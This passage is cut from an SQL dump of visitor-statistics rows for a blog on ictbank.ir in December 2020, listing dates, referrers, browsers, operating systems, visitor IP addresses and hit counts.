(7176,'2020-12-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7177,'2020-12-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(7178,'2020-12-12','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','62.165.196.34','000',0,1,0),
(7179,'2020-12-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(7180,'2020-12-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,2,0),
(7181,'2020-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.255.133.51','000',0,1,0),
(7182,'2020-12-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(7183,'2020-12-13','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','112.14.3.200','000',0,1,0),
(7184,'2020-12-13','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.137.158.151','000',0,1,0),
(7185,'2020-12-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.67.141','000',0,1,0),
(7186,'2020-12-13','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','13.58.68.122','000',0,1,0),
(7187,'2020-12-13','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.28.157.97','000',0,3,0),
(7188,'2020-12-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.130.55','000',0,1,0),
(7189,'2020-12-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7190,'2020-12-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(7191,'2020-12-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.145.203.195','000',0,2,0),
(7192,'2020-12-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,7,0),
(7193,'2020-12-14','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','208.86.199.3','000',0,1,0),
(7194,'2020-12-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,5,0),
(7195,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.129','000',0,1,0),
(7196,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.113.227.93','000',0,1,0),
(7197,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.3','000',0,1,0),
(7198,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.56','000',0,1,0),
(7199,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.4','000',0,1,0),
(7200,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.150','000',0,1,0),
(7201,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.15','000',0,1,0),
(7202,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.101','000',0,1,0),
(7203,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','201.150.35.113','000',0,1,0),
(7204,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.29','000',0,1,0),
(7205,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.120.103.130','000',0,1,0),
(7206,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.24','000',0,2,0),
(7207,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.109.9.37','000',0,1,0),
(7208,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.128.42.70','000',0,1,0),
(7209,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.243.16','000',0,1,0),
(7210,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.92.222','000',0,1,0),
(7211,'2020-12-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.67.85.50','000',0,3,0),
(7212,'2020-12-14','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.6.55','000',0,1,0),
(7213,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.239.89','000',0,1,0),
(7214,'2020-12-14','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','49.50.28.133','000',0,3,0),
(7215,'2020-12-14','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','14.20.187.22','000',0,8,0),
(7216,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,2,0),
(7217,'2020-12-14','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.6.132.191','000',0,10,0),
(7218,'2020-12-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7219,'2020-12-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7220,'2020-12-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(7221,'2020-12-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(7222,'2020-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.238.234.164','000',0,10,0),
(7223,'2020-12-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(7224,'2020-12-15','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','117.50.137.13','000',0,3,0),
(7225,'2020-12-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','14.236.17.205','000',0,3,0),
(7226,'2020-12-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,2,0),
(7227,'2020-12-15','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','185.222.6.203','000',0,1,0),
(7228,'2020-12-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','69.162.99.42','000',0,1,0),
(7229,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.175.47','000',0,1,0),
(7230,'2020-12-15','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','134.209.214.176','000',0,1,0),
(7231,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.20','000',0,1,0),
(7232,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','187.73.192.200','000',0,1,0),
(7233,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.155','000',0,1,0),
(7234,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.194.69.98','000',0,1,0),
(7235,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.201.61.149','000',0,1,0),
(7236,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.66','000',0,1,0),
(7237,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.123','000',0,1,0),
(7238,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.74.138.9','000',0,1,0),
(7239,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.171.163.29','000',0,1,0),
(7240,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.235.43.39','000',0,1,0),
(7241,'2020-12-15','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','185.96.135.119','000',0,1,0),
(7242,'2020-12-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7243,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','182.138.137.98','000',0,1,0),
(7244,'2020-12-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.162.109.106','000',0,1,0),
(7245,'2020-12-15','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.19.30.154','000',0,1,0),
(7246,'2020-12-15','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','50.249.126.53','000',0,1,0),
(7247,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.37.65','000',0,1,0),
(7248,'2020-12-15','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','143.255.57.76','000',0,2,0),
(7249,'2020-12-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(7250,'2020-12-15','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','95.216.15.49','000',0,1,0),
(7251,'2020-12-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7252,'2020-12-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7253,'2020-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(7254,'2020-12-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7255,'2020-12-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.80.91.4','000',0,1,0),
(7256,'2020-12-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(7257,'2020-12-16','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','18.202.22.23','000',0,1,0),
(7258,'2020-12-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.225.82.182','000',0,2,0),
(7259,'2020-12-16','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','81.70.54.208','000',0,1,0),
(7260,'2020-12-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.185.241.102','000',0,1,0),
(7261,'2020-12-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.29.61','000',0,1,0),
(7262,'2020-12-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','205.169.39.32','000',0,1,0),
(7263,'2020-12-16','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','154.113.16.226','000',0,3,0),
(7264,'2020-12-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','18.188.161.180','000',0,32,0),
(7265,'2020-12-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(7266,'2020-12-16','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','163.172.110.238','000',0,1,0),
(7267,'2020-12-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.194.51','000',0,1,0),
(7268,'2020-12-16','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.191.5.171','000',0,1,0),
(7269,'2020-12-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','34.95.185.149','000',0,2,0),
(7270,'2020-12-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7271,'2020-12-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7272,'2020-12-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7273,'2020-12-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.124.218','000',0,1,0),
(7274,'2020-12-16','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(7275,'2020-12-16','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.4.33.48','000',0,1,0),
(7276,'2020-12-16','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','85.10.56.132','000',0,2,0),
(7277,'2020-12-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.214','000',0,2,0),
(7278,'2020-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','119.204.110.102','000',0,40,0),
(7279,'2020-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','183.157.175.66','000',0,9,0),
(7280,'2020-12-17','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.1',NULL,NULL,'','85.10.56.132','000',0,2,0),
(7281,'2020-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.137.172','000',0,1,0),
(7282,'2020-12-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(7283,'2020-12-17','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','188.165.174.33','000',0,84,0),
(7284,'2020-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.206.91','000',0,1,0),
(7285,'2020-12-17','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.239.126.237','000',0,1,0),
(7286,'2020-12-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,1,0),
(7287,'2020-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','39.98.91.173','000',0,2,0),
(7288,'2020-12-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7289,'2020-12-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7290,'2020-12-17','http://ictbank.ir/blog','Android Browser','Android','2.0',NULL,NULL,'','220.181.77.162','000',0,3,0),
(7291,'2020-12-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7292,'2020-12-17','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Opera','Windows','10.0',NULL,NULL,'','37.120.203.72','000',0,2,0),
(7293,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(7294,'2020-12-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(7295,'2020-12-18','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','101.206.1.250','000',0,12,0),
(7296,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','118.190.157.136','000',0,1,0),
(7297,'2020-12-18','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','120.11.194.124','000',0,1,0),
(7298,'2020-12-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7299,'2020-12-18','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','111.206.250.198','000',0,1,0),
(7300,'2020-12-18','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','82.145.215.206','000',0,1,0),
(7301,'2020-12-18','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.192.199','000',0,1,0),
(7302,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.140','000',0,1,0),
(7303,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.248.172','000',0,1,0),
(7304,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.153.197.37','000',0,1,0),
(7305,'2020-12-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,2,0),
(7306,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.122.147','000',0,1,0),
(7307,'2020-12-18','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.239.113.113','000',0,1,0),
(7308,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.139','000',0,1,0),
(7309,'2020-12-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.118.7','000',0,1,0),
(7310,'2020-12-18','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','2.59.241.174','000',0,2,0),
(7311,'2020-12-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7312,'2020-12-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(7313,'2020-12-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','160.116.240.12','000',0,1,0),
(7314,'2020-12-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.124.218','000',0,1,0),
(7315,'2020-12-18','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.223.165.28','000',0,1,0),
(7316,'2020-12-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7317,'2020-12-19','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','77.222.115.97','000',0,10,0),
(7318,'2020-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.67.223','000',0,2,0),
(7319,'2020-12-19','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','165.22.12.139','000',0,1,0),
(7320,'2020-12-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','202.133.247.208','000',0,2,0),
(7321,'2020-12-19','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','5.188.84.115','000',0,9,0),
(7322,'2020-12-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','111.121.91.186','000',0,3,0),
(7323,'2020-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.106.53','000',0,1,0),
(7324,'2020-12-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.162.89.202','000',0,1,0),
(7325,'2020-12-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.15','000',0,3,0),
(7326,'2020-12-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7327,'2020-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.16.239','000',0,1,0),
(7328,'2020-12-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.124.218','000',0,1,0),
(7329,'2020-12-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7330,'2020-12-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7331,'2020-12-19','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','120.52.152.20','000',0,1,0),
(7332,'2020-12-19','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.117','000',0,1,0),
(7333,'2020-12-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.103','000',0,1,0),
(7334,'2020-12-19','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.226.239.230','000',0,1,0),
(7335,'2020-12-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.111.39','000',0,1,0),
(7336,'2020-12-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','163.172.55.51','000',0,1,0),
(7337,'2020-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','39.98.91.173','000',0,1,0),
(7338,'2020-12-20','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.215.83.139','000',0,1,0),
(7339,'2020-12-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','80.94.93.27','000',0,1,0),
(7340,'2020-12-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,1,0),
(7341,'2020-12-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.6','000',0,1,0),
(7342,'2020-12-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7343,'2020-12-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.118.7','000',0,1,0),
(7344,'2020-12-20','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.122.17.108','000',0,1,0),
(7345,'2020-12-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','95.130.175.250','000',0,2,0),
(7346,'2020-12-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.119.5','000',0,1,0),
(7347,'2020-12-20','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.239.2.143','000',0,1,0),
(7348,'2020-12-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.15','000',0,6,0),
(7349,'2020-12-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.22.101.69','000',0,1,0),
(7350,'2020-12-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.37.175.130','000',0,1,0),
(7351,'2020-12-20','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.17.27.93','000',0,1,0),
(7352,'2020-12-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','94.156.140.245','000',0,1,0),
(7353,'2020-12-20','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','117.14.157.230','000',0,1,0),
(7354,'2020-12-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.16.239','000',0,1,0),
(7355,'2020-12-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7356,'2020-12-20','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','5.183.37.134','000',0,1,0),
(7357,'2020-12-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','47.242.159.174','000',0,2,0),
(7358,'2020-12-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(7359,'2020-12-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7360,'2020-12-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.120.202','000',0,1,0),
(7361,'2020-12-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,2,0),
(7362,'2020-12-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','92.20.38.103','000',0,1,0),
(7363,'2020-12-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7364,'2020-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.225.166','000',0,1,0),
(7365,'2020-12-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.15','000',0,3,0),
(7366,'2020-12-21','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.245.113.228','000',0,1,0),
(7367,'2020-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.48.89','000',0,1,0),
(7368,'2020-12-21','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.223.116.39','000',0,1,0),
(7369,'2020-12-21','http://ictbank.ir/blog','Firefox','OS X','10.11',NULL,NULL,'','79.175.0.59','000',0,1,0),
(7370,'2020-12-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.105.124.159','000',0,3,0),
(7371,'2020-12-21','http://ictbank.ir/blog','Safari','OS X','Unknown',NULL,NULL,'','191.101.72.50','000',0,1,0),
(7372,'2020-12-21','http://ictbank.ir/blog','iTunes','OS X','10.6.2',NULL,NULL,'','179.61.163.35','000',0,1,0),
(7373,'2020-12-21','http://ictbank.ir/blog','GNOME Web','Linux','Unknown',NULL,NULL,'','23.95.235.120','000',0,1,0),
(7374,'2020-12-21','http://ictbank.ir/blog','Konqueror','NetBSD','4.0',NULL,NULL,'','107.173.7.235','000',0,1,0),
(7375,'2020-12-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7376,'2020-12-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(7377,'2020-12-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.146.34','000',0,1,0),
(7378,'2020-12-21','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(7379,'2020-12-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(7380,'2020-12-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.111.39','000',0,1,0),
(7381,'2020-12-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.15','000',0,4,0),
(7382,'2020-12-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.125.166','000',0,1,0),
(7383,'2020-12-22','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','58.16.34.3','000',0,1,0),
(7384,'2020-12-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','60.208.166.89','000',0,1,0),
(7385,'2020-12-22','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.172.99.230','000',0,81,0),
(7386,'2020-12-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(7387,'2020-12-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.118.7','000',0,1,0),
(7388,'2020-12-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.207.2','000',0,1,0),
(7389,'2020-12-22','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.20.234.127','000',0,1,0),
(7390,'2020-12-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7391,'2020-12-22','http://ictbank.ir/blog','Instagram','iOS','14.0.1',NULL,NULL,'','5.113.234.80','000',0,3,0),
(7392,'2020-12-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(7393,'2020-12-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7394,'2020-12-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7395,'2020-12-22','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.242.143.22','000',0,1,0),
(7396,'2020-12-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.120.202','000',0,1,0),
(7397,'2020-12-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7398,'2020-12-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7399,'2020-12-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7400,'2020-12-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','172.58.144.80','000',0,1,0),
(7401,'2020-12-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','171.36.143.39','000',0,1,0),
